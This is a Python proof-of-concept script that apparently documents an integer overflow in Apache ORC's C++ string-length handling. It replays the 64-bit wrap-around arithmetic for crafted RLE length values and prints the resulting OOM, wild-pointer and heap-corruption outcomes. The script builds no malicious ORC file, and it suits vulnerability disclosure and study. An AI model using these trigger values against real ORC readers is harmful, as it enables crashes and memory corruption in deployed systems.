#!/usr/bin/env python3
"""
PoC: Apache ORC String Length Integer Overflow
===============================================

Root cause: ColumnReader.cc:697
    totalLength += static_cast<size_t>(lengths[i]);
    // lengths[i] is int64_t from unsigned RLE decoder — NO negative check

String lengths decoded by unsigned RLE (isSigned=false, line 645) are stored
as int64_t. Values >= 2^63 become negative. static_cast<size_t> on negative
int64_t produces huge size_t → OOM or wrap-to-zero.

This script does not read or write ORC files. It only replays the 64-bit
wrap-around arithmetic in Python and prints what each step evaluates to.
"""

import struct
from typing import List, Sequence, Tuple

# size_t is modelled as a 64-bit unsigned integer: all sums are taken mod 2**64.
_UINT64_MODULUS = 2**64

# Totals strictly below this are reported as an undersized buffer.
_UNDERSIZED_LIMIT = 1000

# Totals strictly above this are reported as an allocation failure.
_OOM_THRESHOLD = 2**40

# (description, raw uint64 lengths as they would leave the unsigned RLE decoder)
_TEST_CASES: Tuple[Tuple[str, Tuple[int, ...]], ...] = (
    ("OOM DoS: single huge length", (2**63,)),
    ("Wrap to 0: two lengths", (2**64 - 1, 1)),
    ("Wrap to 1: crafted pair", (2**64 - 100, 101)),
)

_INTRO_LINES = (
    "ORC StringDirectColumnReader::computeSize() Integer Overflow",
    "=" * 60,
    "",
    "Vulnerable code (ColumnReader.cc:691-706):",
    " size_t totalLength = 0;",
    " for (i = 0; i < numValues; ++i)",
    " totalLength += static_cast<size_t>(lengths[i]); // NO CHECK!",
    "",
    "How negative lengths occur:",
    " 1. RLE decoder is unsigned (isSigned=false, line 645)",
    " 2. Output stored in int64_t* (line 715-718)",
    " 3. uint64 values >= 2^63 become negative int64_t",
    " 4. static_cast<size_t>(negative) = huge positive",
    "",
)

_OUTRO_LINES = (
    "Additional: Stripe offset overflow (Reader.cc:591)",
    " stripeFooterStart = offset + index_length + data_length",
    " All uint64 from protobuf, no overflow check",
    " -> wraps around -> reads wrong file location",
    "",
    "ORC C++ has ZERO safe arithmetic in core parsing code",
    " Reader.cc: 0 overflow checks in 1830 lines",
    " ColumnReader.cc: 0 overflow checks in 1793 lines",
)


def _as_int64(raw: int) -> int:
    """Reinterpret the low 64 bits of *raw* as a two's-complement int64."""
    # Pack as unsigned and unpack as signed: same 8 bytes, different reading.
    return struct.unpack("q", struct.pack("Q", raw % _UINT64_MODULUS))[0]


def _consequence_lines(total: int) -> List[str]:
    """Return the report lines describing what a given totalLength leads to.

    Totals from ``_UNDERSIZED_LIMIT`` through ``_OOM_THRESHOLD`` inclusive
    have no dedicated message and yield an empty list.
    """
    if total == 0:
        return [
            " -> blob.resize(0) -> EMPTY BLOB",
            " -> ptr += lengths[i] with negative -> WILD POINTER -> OOB read",
        ]
    if total < _UNDERSIZED_LIMIT:
        return [
            f" -> blob.resize({total}) -> UNDERSIZED BUFFER",
            " -> actual data > blob size -> HEAP CORRUPTION",
        ]
    if total > _OOM_THRESHOLD:
        return [f" -> blob.resize({total}) -> ALLOCATION FAILURE -> OOM CRASH"]
    return []


def _print_case(desc: str, uint_lengths: Sequence[int]) -> None:
    """Print the per-length conversions and the wrapped sum for one scenario."""
    print(f"Case: {desc}")
    total = 0
    for raw in uint_lengths:
        as_int64 = _as_int64(raw)
        as_size_t = raw % _UINT64_MODULUS
        # Unsigned accumulation wraps silently, exactly like size_t += size_t.
        total = (total + as_size_t) % _UINT64_MODULUS
        print(
            f" RLE uint64={raw:#018x} -> int64={as_int64}"
            f" -> size_t={as_size_t:#018x}"
        )
    print(f" totalLength = {total} ({total:#018x})")
    for line in _consequence_lines(total):
        print(line)
    # Blank separator after every scenario.
    print()


def show_overflow() -> None:
    """Print a walkthrough of the computeSize() length-overflow scenarios.

    Writes to standard output only: a description of the vulnerable loop,
    one report per entry in ``_TEST_CASES`` showing how each raw uint64
    length is seen as int64 and as size_t and what the summed totalLength
    wraps to, then closing notes on a related stripe-offset overflow.
    """
    print("\n".join(_INTRO_LINES))
    for desc, uint_lengths in _TEST_CASES:
        _print_case(desc, uint_lengths)
    print("\n".join(_OUTRO_LINES))


if __name__ == "__main__":
    show_overflow()